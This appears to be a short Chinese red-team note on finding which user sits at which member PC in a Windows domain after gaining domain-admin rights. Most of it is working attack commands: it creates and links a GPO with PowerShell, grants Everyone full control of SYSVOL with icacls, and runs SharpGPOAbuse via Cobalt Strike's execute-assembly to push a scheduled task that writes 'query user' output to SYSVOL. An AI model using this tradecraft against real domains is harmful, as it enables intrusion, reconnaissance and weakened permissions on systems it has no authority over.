域内定位成员pc机的办法 来自星球讨论群组的问题"有什么域内定位成员pc机的好办法吗",其中有师傅提 出: gpo下发 query user 写log到sysvol就好了 一开始没理解,sysvol为啥普通域用户也可以写入,直到师傅的一句 都是域管了,修 改一下文件夹权限,才让我恍然大悟... 创建组策略: powershell Import-Module GroupPolicy;new-gpo -name QueryDomainUser01 连接到域: powershell Import-Module GroupPolicy;new-gplink -name QueryDomainUser01 -Target "dc=vulntarget,dc=com" 之后修改一下sysvol的权限: shell icacls c:\windows\sysvol\ /grant Everyone:(OI)(CI)(F) /T 下发: execute-assembly /root/cs/sharp/SharpGPOAbuse.exe -AddComputerTask --TaskName "QueryDomainUser001" --Author vulntarget\\administrator --Command "cmd.exe" --Arguments "cmd /c query user > \\win2019.vulntarget.com\sysvol\%COMPUTERNAME%.txt" --GPOName "QueryDomainUser01" 之后等待90分钟(我懒得等了,直接强制执行了) gpupdate /force 最终结果 WIN2016 和 WIN2019RY 是我手动输入的 gpupdate /force ,中间回消息了来 着。 当然,路径可以在优化一下,我就懒得再整了